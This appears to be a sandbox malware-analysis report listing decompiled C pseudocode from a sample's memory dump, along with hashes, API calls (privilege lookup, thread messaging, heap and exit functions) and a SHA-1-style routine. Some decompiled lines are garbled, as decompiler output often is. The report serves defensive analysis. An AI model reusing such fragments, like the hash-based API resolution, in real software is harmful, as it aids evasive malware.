Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &E9
API String ID: 1279760036-294309896
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: db6f757f6def1f03c894a00a3443b856267733ec0945bac7e24aede24848095b
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 1CE012B2200208ABDB14EF99CC41EA777ACAF88754F118558BA1D5B242C630F9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 00388308 Relevance: 1.6, APIs: 1, Instructions: 56
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00388308(void* __eax, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t16;
				int _t17;
				long _t27;
				int _t32;
				void* _t35;
				void* _t37;
				void* _t42;

				_t42 = __eflags;
				asm("lds edx, [ebp-0x75]");
				_t35 = _t37;
				_v68 = 0;
				E0039BE50( &_v67, 0, 0x3f);
				E0039C9F0( &_v68, 3);
				_t16 = E0038ACE0(_t42, _a4 + 0x1c,  &_v68); // executed
				_t17 = E00394E40(_a4 + 0x1c, _t16, 0, 0, 0xc4e7b6d6);
				_t32 = _t17;
				if(_t32 != 0) {
					_t27 = _a8;
					_t17 = PostThreadMessageW(_t27, 0x111, 0, 0); // executed
					_t44 = _t17;
					if(_t17 == 0) {
						_t17 =  *_t32(_t27, 0x8003, _t35 + (E0038A470(_t44, 1, 8) & 0x000000ff) - 0x40, _t17);
					}
				}
				return _t17;
			}

0x00388308
0x0038830f
0x00388311
0x0038831f
0x00388323
0x0038832e
0x0038833e
0x0038834e
0x00388353
0x0038835a
0x0038835d
0x0038836a
0x0038836c
0x0038836e
0x0038838b
0x0038838b
0x0038838d
0x00388392

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0038836A

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: d2c870aafc8f5c1776de9bc77c66467071d44163b5cb332586659da32af26e77
Instruction ID: 798ecbb0092544416f2faad39ce3a5c206cb96aa0238c53cdfed4d7291c6121e
Opcode Fuzzy Hash: d2c870aafc8f5c1776de9bc77c66467071d44163b5cb332586659da32af26e77
Instruction Fuzzy Hash: 5001B531A4022876EB22A7A49C43FFE7B6CAB41F51F054159FF04BE1C2D6E4690647E5

Uniqueness

Uniqueness Score: -1.00%

Function 00388310 Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00388310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0039BE50( &_v67, 0, 0x3f);
				E0039C9F0( &_v68, 3);
				_t12 = E0038ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00394E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0038A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00388310
0x0038831f
0x00388323
0x0038832e
0x0038833e
0x0038834e
0x00388353
0x0038835a
0x0038835d
0x0038836a
0x0038836c
0x0038836e
0x0038838b
0x0038838b
0x00000000
0x0038838d
0x00388392

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0038836A

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction ID: b6726ec4b88f5ebfec65997c577f55f163da36a6080d4115f768fbccb8f626c6
Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
Instruction Fuzzy Hash: 5C018F31A8032877EB22B6949C03FBE776C6B40F51F050159FF04BE1C2EAE4690647E6

Uniqueness

Uniqueness Score: -1.00%

Function 0039A660 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0039A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0039AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0039a66f
0x0039a677
0x0039a68d
0x0039a691

APIs

RtlFreeHeap.NTDLL(00000060,00389CE3,?,?,00389CE3,00000060,00000000,00000000,?,?,00389CE3,?,00000000), ref: 0039A68D

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 517bc75e9d175dcd2887ea4b6e4710446d04681907aefbff97a5a246cf7e3512
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 77E01AB12002046BDB14DF59CC45EA777ACAF88750F014554B91D5B241C630E9108AF0

Uniqueness

Uniqueness Score: -1.00%

Function 0039A7C0 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0039A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				WCHAR* _t9;
				int _t10;
				WCHAR* _t12;
				struct _LUID* _t13;
				void* _t15;

				E0039AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t13 = _a16;
				_t9 = _a12;
				_t12 = _a8;
				_t10 = LookupPrivilegeValueW(_t12, _t9, _t13); // executed
				return _t10;
			}

0x0039a7da
0x0039a7df
0x0039a7e2
0x0039a7e5
0x0039a7f0
0x0039a7f4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0038F1C2,0038F1C2,0000003C,00000000,?,00389D55), ref: 0039A7F0

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: ef62b092ce1ea413f230aab7d92d4c32ed5a81748a87165b9d9eecce517f23d8
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: DDE01AB12002086BDB10DF49CC85EE737ADAF89750F018154BA0D5B241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0039A6A0 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0039A6A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0039AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0039a6a3
0x0039a6ba
0x0039a6c8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0039A6C8

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: ff057b98d55bb89f50a351848877bf06dc9ba831ba07f21e38b98ecc80cc60d6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 49D017726002187BDA20EB98CC85FE777ACDF497A0F0181A5BA1D6B242C531BA008AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0039A652 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E0039A652(void* __eax, char __ebx, char* __edi, intOrPtr _a5, void* _a9, long _a13, void* _a17) {
				signed int _v374149405;
				char _t14;
				signed int _t24;

				asm("out dx, eax");
				_v374149405 = _v374149405 ^ _t24;
				asm("loop 0x4a");
				 *__edi = __ebx;
				_push(_t24);
				_t11 = _a5;
				_t5 = _t11 + 0xc74; // 0xc74
				E0039AF50(__edi, _a5, _t5,  *((intOrPtr*)(_a5 + 0x10)), 0, 0x35);
				_t14 = RtlFreeHeap(_a9, _a13, _a17); // executed
				return _t14;
			}

0x0039a652
0x0039a653
0x0039a65b
0x0039a65d
0x0039a660
0x0039a663
0x0039a66f
0x0039a677
0x0039a68d
0x0039a691

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0039A6C8

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 561a558681fa3a41e3b422ec0f9d5bec744954e3cc63d7ab04dc55ad1bc1c52f
Instruction ID: 79a4b6b27e08859f10c7bbfbd6b482ea1fe0cf983c69fb2e47e20d71a21f2500
Opcode Fuzzy Hash: 561a558681fa3a41e3b422ec0f9d5bec744954e3cc63d7ab04dc55ad1bc1c52f
Instruction Fuzzy Hash: 93E08C75A096426BEB02DF348C86A877F648F66340F2885A8A8996B542C530A2058BE2

Uniqueness

Uniqueness Score: -1.00%

Function 0039A765 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0039A765(WCHAR* __eax, void* __ebx, struct _LUID* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a96) {
				intOrPtr _v0;
				WCHAR* _t16;
				int _t17;
				WCHAR* _t24;
				void* _t33;
				void* _t34;
				intOrPtr* _t36;
				void* _t38;
				void* _t42;

				asm("adc esp, edi");
				_t1 =  &_a96;
				_t16 =  *_t1;
				 *_t1 = __eax;
				if(__eflags > 0) {
					_t17 = LookupPrivilegeValueW(_t24, _t16, __edx); // executed
					return _t17;
				} else {
					_t18 = _v0;
					_t8 = _t18 + 0xc88; // 0xd8c
					_t36 = _t8;
					E0039AF50(_t33, _v0, _t36,  *((intOrPtr*)(_t18 + 0xa14)), 0, 0x39);
					return  *((intOrPtr*)( *_t36))(_a4, _a8, _a12, _a16, _a20, _a24, _t34, _t38, _t42);
				}
			}

0x0039a765
0x0039a767
0x0039a767
0x0039a767
0x0039a76a
0x0039a7f0
0x0039a7f4
0x0039a76c
0x0039a773
0x0039a782
0x0039a782
0x0039a78a
0x0039a7b0
0x0039a7b0

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0038F1C2,0038F1C2,0000003C,00000000,?,00389D55), ref: 0039A7F0

Memory Dump Source

Source File: 00000000.00000002.283734451.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.283724906.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283916547.000000000039F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.283927910.00000000003A0000.00000020.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_S22Ls0H4Sz.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 280914c5556fbf1310149cc9cc0bea5dbcd9d4911544087be0d8331a4a847cc2
Instruction ID: d9f12ad449d04811a4dd6a1ddbbd041d90e20622d824765edf3de75cf312d28a
Opcode Fuzzy Hash: 280914c5556fbf1310149cc9cc0bea5dbcd9d4911544087be0d8331a4a847cc2
Instruction Fuzzy Hash: BCC080710456855E9711D6947C41C57775CFEC41043144659FC4841101D6218810C6E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00389E50 Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E00389E50(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
					_v16 = _t358;
					_t370 = _v12;
					_v12 = _t445;
					asm("rol edx, 0x5");
					_v16 = _t279;
					asm("ror ecx, 0x2");
					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
					_t404 = _v12;
					_v12 = _t303;
					asm("rol eax, 0x5");
					_v16 = _t346;
					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
					_t305 = _t370;
					_v8 = _t346;
					asm("ror edx, 0x2");
					_v8 = _t370;
					_t358 = _v12;
					_v12 = _t532;
					asm("rol esi, 0x5");
					_t478 = _t479 + 5;
					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t305;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t404;
					_v12 = _t499;
					_v8 = _t478;
				} while (_t478 < 0x50);
				_t480 = _a4;
				_t480[2] = _t480[2] + _t358;
				_t480[3] = _t480[3] + _t404;
				_t311 = _t480[4] + _v16;
				 *_t480 =  *_t480 + _t499;
				_t480[1] = _t480[1] + _t279;
				_t480[4] = _t311;
				_t480[0x17] = 0;
				return _t311;
			}

0x00389e5b
0x00389e5f
0x00389e61
0x00389e61
0x00389e64
0x00389e86
0x00389eac
0x00389ed2
0x00389ef4
0x00389efb
0x00389efe
0x00389f01
0x00389f0a
0x00389f10
0x00389f17
0x00389f28
0x00389f2b
0x00389f2e
0x00389f32
0x00389f34
0x00389f36
0x00389f3f
0x00389f42
0x00389f45
0x00389f50
0x00389f56
0x00389f58
0x00389f58
0x00389f5b
0x00389f5e
0x00389f5e
0x00389f63
0x00389f65
0x00389f68
0x00389f6b
0x00389f71
0x00389f74
0x00389f77
0x00389f80
0x00389f86
0x00389f8f
0x00389f9e
0x00389fa5
0x00389fa8
0x00389fab
0x00389fb4
0x00389fb7
0x00389fba
0x00389fd2
0x00389fd9
0x00389fdb
0x00389fde
0x00389fe1
0x00389fea
0x00389ff1
0x00389ff4
0x00389ff7
0x0038a006
0x0038a00d
0x0038a010
0x0038a013
0x0038a01c
0x0038a026
0x0038a029
0x0038a035
0x0038a038
0x0038a03f
0x0038a042
0x0038a045
0x0038a04a
0x0038a04d
0x0038a056
0x0038a067
0x0038a06a
0x0038a06d
0x0038a074
0x0038a077
0x0038a07a
0x0038a07d
0x0038a07f
0x0038a082
0x0038a085
0x0038a08e
0x0038a093
0x0038a093
0x0038a0a8
0x0038a0ab
0x0038a0ae
0x0038a0b5
0x0038a0b8
0x0038a0bb
0x0038a0d0
0x0038a0d7
0x0038a0da
0x0038a0de
0x0038a0e1
0x0038a0e6
0x0038a0e9
0x0038a0f8
0x0038a0fb
0x0038a102
0x0038a105
0x0038a108
0x0038a10b
0x0038a10e
0x0038a116
0x0038a124
0x0038a127
0x0038a12a
0x0038a12a
0x0038a131
0x0038a134
0x0038a137
0x0038a13f
0x0038a14d
0x0038a150
0x0038a157
0x0038a15a
0x0038a15d
0x0038a160
0x0038a163
0x0038a16c
0x0038a173
0x0038a173
0x0038a179
0x0038a192
0x0038a195
0x0038a19c
0x0038a19f
0x0038a1a2
0x0038a1b4
0x0038a1be
0x0038a1c1
0x0038a1ca
0x0038a1cd
0x0038a1d4
0x0038a1d7
0x0038a1dd
0x0038a1f0
0x0038a1f7
0x0038a1fa
0x0038a1fd
0x0038a200
0x0038a209
0x0038a20c
0x0038a21f
0x0038a222
0x0038a22c
0x0038a22f
0x0038a231
0x0038a23a
0x0038a23d
0x0038a250
0x0038a256
0x0038a259
0x0038a260
0x0038a262
0x0038a265
0x0038a268
0x0038a26b
0x0038a26e
0x0038a271
0x0038a27a
0x0038a27f
0x0038a282
0x0038a282
0x0038a295
0x0038a298
0x0038a29b
0x0038a2a2
0x0038a2a5
0x0038a2a8
0x0038a2ab
0x0038a2be
0x0038a2c1
0x0038a2cc
0x0038a2cf
0x0038a2db
0x0038a2de
0x0038a2e4
0x0038a2e7
0x0038a2ea
0x0038a2f1
0x0038a301
0x0038a304
0x0038a30a
0x0038a30d
0x0038a314
0x0038a316
0x0038a319
0x0038a31c
0x0038a31f
0x0038a322
0x0038a329
0x0038a338
0x0038a33b
0x0038a342
0x0038a345
0x0038a348
0x0038a34b
0x0038a34e
0x0038a351
0x0038a354
0x0038a35d
0x0038a36e
0x0038a376
0x0038a37c
0x0038a37f
0x0038a381
0x0038a384
0x0038a387
0x0038a394

Strings

(, xrefs: 0038A16C

Memory Dump Source

